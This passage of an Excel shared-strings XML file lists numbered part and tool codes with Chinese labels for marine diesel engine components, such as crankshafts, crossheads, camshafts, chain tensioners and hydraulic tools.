      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱滑油出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱滑油出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端垫块安装液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-0211 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部垫块螺柱用液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-0221 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大件组装用液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架用液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1001 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴用液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1011 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1021 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴样针</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1030 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1035 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴偏斜工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1040 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1070-1401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓端部衬垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0630 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0630 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架数据</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0640 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱体盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0710 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0710 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-0800 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动箱上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-1000 - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-1000 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-1100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-1200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1072-1400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>111-…</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伏特开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>12.7×18.7</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按钮符号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>141</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>142</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>143</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1440-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动装置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1465-0100</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复运动件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1465-0101</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复运动件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0700 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0701 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0800 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0801 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0900 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-0901 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-1000 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-1001 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-1031 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动装置，数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-1032 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-1100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴上更换凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1465-1101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴上更换凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆和十字头工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0306 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0310 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0315 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0510 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0521 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头端工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0611 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-0621 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴联轴器液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-1400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1470-1411 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链驱动装置工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-0310 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆压缩垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-0320 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆附加重量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-0600 - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-1301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-1420 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动导杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-1420 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1472-1801 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功器驱动装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>148</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1610-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1620-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>17</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1840-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动装置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1865-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1865-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1865-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1865-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器</t>
    </r>
